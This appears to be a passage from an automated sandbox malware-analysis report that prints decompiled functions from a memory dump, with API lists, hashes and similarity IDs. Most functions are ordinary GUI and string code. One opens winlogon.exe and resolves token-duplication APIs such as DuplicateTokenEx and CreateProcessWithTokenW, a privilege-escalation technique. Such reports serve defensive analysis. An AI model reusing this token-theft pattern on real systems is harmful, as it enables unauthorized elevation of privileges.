                                                                                                                    0x0040ae13
                                                                                                                    0x00000000
                                                                                                                    0x0040ae10

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy
                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                    • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                    • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                    • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                    • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                    0x004041f9
                                                                                                                    0x00404205
                                                                                                                    0x00404208
                                                                                                                    0x00404217
                                                                                                                    0x0040421e
                                                                                                                    0x00404236
                                                                                                                    0x0040423f
                                                                                                                    0x0040424a
                                                                                                                    0x0040425f
                                                                                                                    0x0040426b
                                                                                                                    0x0040426e
                                                                                                                    0x0040426e
                                                                                                                    0x00404275
                                                                                                                    0x004043be
                                                                                                                    0x004043ce
                                                                                                                    0x004043d0
                                                                                                                    0x004043d3
                                                                                                                    0x004043da
                                                                                                                    0x004043da
                                                                                                                    0x004043c0
                                                                                                                    0x004043c3
                                                                                                                    0x004043c3
                                                                                                                    0x0040427b
                                                                                                                    0x0040428c
                                                                                                                    0x0040428f
                                                                                                                    0x00404295
                                                                                                                    0x004042a5
                                                                                                                    0x004042b8
                                                                                                                    0x004042cb
                                                                                                                    0x004042de
                                                                                                                    0x004042f1
                                                                                                                    0x00404304
                                                                                                                    0x00404317
                                                                                                                    0x0040432a
                                                                                                                    0x0040433d
                                                                                                                    0x00404350
                                                                                                                    0x00404363
                                                                                                                    0x00404376
                                                                                                                    0x00404389
                                                                                                                    0x0040439c
                                                                                                                    0x004043a4
                                                                                                                    0x004043af
                                                                                                                    0x004043b5
                                                                                                                    0x004043b5
                                                                                                                    0x004043f5

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040421E
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                    • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                      • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                      • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 2142561256-3993045852
                                                                                                                    • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                    • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                    • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                    • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                    0x00405b81
                                                                                                                    0x00405b88
                                                                                                                    0x00405b8a
                                                                                                                    0x00405b8a
                                                                                                                    0x00405b8f
                                                                                                                    0x00405b96
                                                                                                                    0x00405b9b
                                                                                                                    0x00405bad
                                                                                                                    0x00405bad
                                                                                                                    0x00405b9d
                                                                                                                    0x00405b9d
                                                                                                                    0x00405ba8
                                                                                                                    0x00405bab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405bab
                                                                                                                    0x00405be9
                                                                                                                    0x00405be9
                                                                                                                    0x00405baf
                                                                                                                    0x00405bb1
                                                                                                                    0x00405ce2
                                                                                                                    0x00405ce2
                                                                                                                    0x00405bb7
                                                                                                                    0x00405bbd
                                                                                                                    0x00405bf6
                                                                                                                    0x00405c4b
                                                                                                                    0x00405c4c
                                                                                                                    0x00405c52
                                                                                                                    0x00405c53
                                                                                                                    0x00000000
                                                                                                                    0x00405bf8
                                                                                                                    0x00405c02
                                                                                                                    0x00405c0e
                                                                                                                    0x00405c13
                                                                                                                    0x00405c18
                                                                                                                    0x00405c2c
                                                                                                                    0x00405c2e
                                                                                                                    0x00405c3b
                                                                                                                    0x00405c3c
                                                                                                                    0x00405c42
                                                                                                                    0x00000000
                                                                                                                    0x00405c1a
                                                                                                                    0x00405c25
                                                                                                                    0x00405c2a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c2a
                                                                                                                    0x00405c18
                                                                                                                    0x00405bbf
                                                                                                                    0x00405bc0
                                                                                                                    0x00405bcd
                                                                                                                    0x00405bce
                                                                                                                    0x00405bd7
                                                                                                                    0x00405c58
                                                                                                                    0x00405c5f
                                                                                                                    0x00405c61
                                                                                                                    0x00405c61
                                                                                                                    0x00405c63
                                                                                                                    0x00405cdb
                                                                                                                    0x00405cdb
                                                                                                                    0x00405c65
                                                                                                                    0x00405c65
                                                                                                                    0x00405c74
                                                                                                                    0x00000000
                                                                                                                    0x00405c84
                                                                                                                    0x00405c8a
                                                                                                                    0x00405c8d
                                                                                                                    0x00405c99
                                                                                                                    0x00405caf
                                                                                                                    0x00405cbd
                                                                                                                    0x00405cc8
                                                                                                                    0x00405cd4
                                                                                                                    0x00405cd9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405cd9
                                                                                                                    0x00405c74
                                                                                                                    0x00405c63
                                                                                                                    0x00405ce6

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                    • wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                      • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                    • wcslen.MSVCRT ref: 00405C20
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                    • memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                    • String ID: strings
                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                    • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                    • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                    • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                    • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                    0x00401e59
                                                                                                                    0x00401e5c
                                                                                                                    0x00401e64
                                                                                                                    0x00401e67
                                                                                                                    0x00401ef9
                                                                                                                    0x00401e6d
                                                                                                                    0x00401e70
                                                                                                                    0x00401e76
                                                                                                                    0x00401e79
                                                                                                                    0x00401e7e
                                                                                                                    0x00401e83
                                                                                                                    0x00401e92
                                                                                                                    0x00401e85
                                                                                                                    0x00401e8e
                                                                                                                    0x00401e8e
                                                                                                                    0x00401e96
                                                                                                                    0x00401ee6
                                                                                                                    0x00401e98
                                                                                                                    0x00401e9b
                                                                                                                    0x00401e9e
                                                                                                                    0x00401ea3
                                                                                                                    0x00401ea8
                                                                                                                    0x00401ebb
                                                                                                                    0x00401eaa
                                                                                                                    0x00401eb7
                                                                                                                    0x00401eb7
                                                                                                                    0x00401ebf
                                                                                                                    0x00401ed3
                                                                                                                    0x00401ec1
                                                                                                                    0x00401ec7
                                                                                                                    0x00401ec9
                                                                                                                    0x00401ec9
                                                                                                                    0x00401ed8
                                                                                                                    0x00401ed8
                                                                                                                    0x00401eeb
                                                                                                                    0x00401eeb
                                                                                                                    0x00401f01

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                      • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                    • String ID: winlogon.exe
                                                                                                                    • API String ID: 1315556178-961692650
                                                                                                                    • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                    • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                    • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                    • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                    0x00405241
                                                                                                                    0x00405250
                                                                                                                    0x00405257
                                                                                                                    0x0040525f
                                                                                                                    0x00405262
                                                                                                                    0x00405265
                                                                                                                    0x00405268
                                                                                                                    0x0040526f
                                                                                                                    0x0040526f
                                                                                                                    0x00405277
                                                                                                                    0x00405277
                                                                                                                    0x0040527a
                                                                                                                    0x0040527f
                                                                                                                    0x00405284
                                                                                                                    0x00405285
                                                                                                                    0x00405291
                                                                                                                    0x00405296
                                                                                                                    0x004052a9
                                                                                                                    0x004052b3
                                                                                                                    0x004052b7
                                                                                                                    0x004052bc
                                                                                                                    0x004052ca
                                                                                                                    0x004052d2
                                                                                                                    0x004052d5
                                                                                                                    0x004052d8
                                                                                                                    0x004052d8
                                                                                                                    0x004052db
                                                                                                                    0x004052db
                                                                                                                    0x004052e1
                                                                                                                    0x004052e4
                                                                                                                    0x004052e8
                                                                                                                    0x004052f2

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                    • String ID: %s (%s)
                                                                                                                    • API String ID: 3979103747-1363028141
                                                                                                                    • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                    • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                    • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                    • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                    0x00406157
                                                                                                                    0x0040616d
                                                                                                                    0x00406174
                                                                                                                    0x0040617f
                                                                                                                    0x00406185
                                                                                                                    0x00406196
                                                                                                                    0x0040619e
                                                                                                                    0x004061b6
                                                                                                                    0x004061bd
                                                                                                                    0x004061d4
                                                                                                                    0x004061da
                                                                                                                    0x004061e0
                                                                                                                    0x004061e5
                                                                                                                    0x004061e6
                                                                                                                    0x004061ef
                                                                                                                    0x004061f9
                                                                                                                    0x004061ff
                                                                                                                    0x004061ef
                                                                                                                    0x00406206

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                    • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                    • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                    • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                    • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                    0x00404706
                                                                                                                    0x00404714
                                                                                                                    0x0040471c
                                                                                                                    0x00404721
                                                                                                                    0x0040472b
                                                                                                                    0x00404733
                                                                                                                    0x00404735
                                                                                                                    0x00404735
                                                                                                                    0x00404733
                                                                                                                    0x00404751
                                                                                                                    0x00404780
                                                                                                                    0x00404753
                                                                                                                    0x0040475e
                                                                                                                    0x00404766
                                                                                                                    0x0040476c
                                                                                                                    0x00404770
                                                                                                                    0x00404770
                                                                                                                    0x0040478a

                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                    • wcslen.MSVCRT ref: 00404756
                                                                                                                    • wcscpy.MSVCRT ref: 00404766
                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                    • wcscpy.MSVCRT ref: 00404780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                    • String ID: netmsg.dll
                                                                                                                    • API String ID: 2767993716-3706735626
